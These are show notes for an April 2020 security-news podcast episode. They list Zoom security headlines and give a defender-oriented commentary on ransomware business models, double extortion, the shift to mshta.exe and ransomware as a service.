Security Weekly News Episode 23 - 2020-04-07
Fullaudio - None
Visit https://www.securityweekly.com/swn for all the latest episodes!
Follow us on Twitter: https://www.twitter.com/securityweeklyLike us on Facebook: https://www.facebook.com/secweekly
Doug White's Content:
Jason Wood's Content:
News - Zooming, Zoomie, & Zoomfest Zoo
Doug White's Content:
- Zoombombers threatened with jail time by FBI.
- Zoom used banned by Taiwan's Government.
- Cybercriminals are trying to cash in on Zoom use.
- Thousands of Zoom video calls left exposed to public.
- How to protect your Zoom calls.
- Bad Bots in 2020.
- CyberHero Comics, Defending your Health.
- AI going forward article.
Jason Wood's Content:
Sometimes it's easy to forget that ransomware is a business to those that participate in it. We think of them in terms of being criminals, but they do actually have a number of the same pressures that legitimate businesses have. In particular, it's all about the revenue and profit. So in that vein, apparently "sales" have been impacted as companies are getting better at recovering from ransomware attacks. Maybe not as much as we would like, but enough to impact the income of these organizations. To help maintain and/or increase their revenues, they've decided to make some changes in how their attacks work. One of these innovations is the idea of using the fear of bad publicity to pressure organizations to pay up.
How does this work? Like we would normally expect, the attacker gets on to the system and deploys their tools. They may do some recon to find other hosts to attack, but now some of these groups have added an additional step before executing the ransomware. Now they are copying data from the system to the attacker's infrastructure and then locking up the host with ransomware. In the ransom note, the attackers demand payment to unlock the system and threaten that if they do not pay up within a set period of time, they will release the data they've stolen publicly. So even if you successfully recover your data and systems from the attack, you still may face the bad publicity associated with the data being released.
Another change that's out there is a change in tactics that ransomware ops are dealing with is switching from powershell.exe to mshta.exe to execute ransomware. This is probably due to more attention being paid to attacks using PowerShell. The attackers have decided to switch to mshta.exe to hopefully avoid preventions from stopping the ransomware from successfully deploying.
As I mentioned earlier, these groups are operating in a manner similar to legitimate businesses. One of the interesting methods of making money and offloading the work, is Ransomware as a Service (RaaS). In this case, individuals or smaller groups decide they want to get into the ransomware "industry", but don't have the skills or time to build their own ransomware and the infrastructure that goes with it. But they are good at delivering it. So instead of creating their own, they contact an RaaS provider and sign up as an affiliate. They get the software and infrastructure they need and can get started much faster. To me this is a rather fascinating aspect of these types of operations. It makes for some types of ransomware to become very wide spread, though through different individual attackers.
All of this information is interesting, but what is the use of knowing it? The thought I had is that we need to keep this in mind as we are looking at our threat models and trying to figure out who we are defending against. It might be tempting to think of our attackers being small groups of individuals who will vary in sophistication and skill. Those certainly exist, but we also have to keep in mind that we have organizations that are operating as businesses and innovating to improve their profitability. They may not be nation-states, but they certainly are executing with a plan, are willing to spend resources to improve their capabilities, and will adapt to how their "marketplace" (meaning our willingness to pay a ransom) responds to their threats. We need to build this into our threat models and communicate the risk they pose to our management so that they are aware of the issues that your organization faces.